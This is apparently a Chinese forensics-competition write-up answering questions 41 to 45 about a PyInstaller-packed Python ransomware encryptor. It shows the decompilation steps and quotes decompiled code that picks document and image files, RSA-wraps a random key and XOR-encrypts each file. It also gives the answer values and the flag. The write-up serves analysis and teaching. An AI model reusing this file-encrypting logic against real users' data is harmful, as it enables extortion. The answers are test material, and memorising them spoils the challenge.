exe分析
分析所有掌握的检材,找到勒索邮件中被加密的文档和对应的加/解密程序,并回答下列问题
41. 分析加密程序,编译该加密程序使用的语言是
python
42. 分析加密程序,它会加密哪些扩展名的文件?
pyinstaller逆向
才发现上面python版本好像报warning了,换了python3.6.8
在解析生成的encrypt_file.exe_extracted
目录中的PYZ-00.pyz_extracted
目录随便找一个.pyc
文件复制前12字节16进制到encrypt_file_1
前面
修改后缀为.pyc
PS C:\Users\12827\Desktop> uncompyle6.exe -o C:\Users\12827\Desktop\encrypt_file.py C:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pyc
C:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pyc --
# Successfully decompiled filexxxxxxxxxx C:\Users\12827\AppData\Local\Packages\PythonSoftwareFoundation.Python.3.10_qbz5n2kfra8p0\LocalCache\local-packages\Python310\Scripts> PS C:\Users\12827\Desktop> uncompyle6.exe -o C:\Users\12827\Desktop\encrypt_file.py C:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pycC:\Users\12827\Desktop\22CACUP\encrypt_file.exe_extracted\encrypt_file_1.pyc --# Successfully decompiled file
查看py文件
if '.txt' == ExtensionPath or '.jpg' == ExtensionPath or '.xls' == ExtensionPath or '.docx' == ExtensionPath:
time.sleep(3)
data_file = os.path.join(filepath, filename)
rsakey = RSA.import_key(pubkey)
cipher = Cipher_pkcs1_v1_5.new(rsakey)
xor_key = os.urandom(16)
xor_obj = XORCBC(xor_key)
outf = open(data_file + '_encrypted', 'wb')
encrypted_xor_key = cipher.encrypt(xor_key)
outf.write(encrypted_xor_key)
buffer_size = 4096
with open(data_file, 'rb') as (f):
while True:
data = f.read(buffer_size)
if not data:
break
outf.write(xor_obj.encrypt(data))
txt、jpg、xls、docx
43. 分析加密程序,是通过什么算法对文件进行加密的?
class XORCBC:
def __init__(self, key: bytes):
self.key = bytearray(key)
self.cur = 0
def encrypt(self, data: bytes) -> bytes:
data = bytearray(data)
for i in range(len(data)):
tmp = data[i]
data[i] ^= self.key[self.cur]
self.key[self.cur] = tmp
self.cur = (self.cur + 1) % len(self.key)
return bytes(data)
XOR
44. 分析加密程序,其使用的非对称加密方式公钥后5位为?
pubkey = '-----BEGIN PUBLIC KEY-----\nMIIBIzANBgkqhkiG9w0BAQEFAAOCARAAMIIBCwKCAQEAx5JF4elVDBaakgGeDSxI\nCO1LyyZ6B2TgR4DNYiQoB1zAyWPDwektaCfnvNeHURBrw++HvbuNMoQNdOJNZZVo\nbHVZh+rCI4MwAh+EBFUeT8Dzja4ZlU9E7jufm69TQS0PSseIiU/4Byd2i9BvIbRn\nHLFZvi/VXphGeW0qVeHkQ3Ll6hJ2fUGhTsuGLc1XXHfiZ4RbJY/AMnjYPy9CaYzi\nSOT4PCf/O12Kuu9ZklsIAihRPl10SmM4IRnVhZYYpXedAyTcYCuUiI4c37F5GAhz\nRDFn9IQ6YQRjlLjuOX8WB6H4NbnKX/kd0GsQP3Zbogazj/z7OM0Y3rv3T8mtF6/I\nkwIEHoau+w==\n-----END PUBLIC KEY-----\n'
u+w==
45. 被加密文档中,FLAG1的值是(FLAG为8位字符串,如“FLAG9:QWERT123”)
使用同样的方法逆向decrypt_file.exe
使用密码解密
TREFWGFS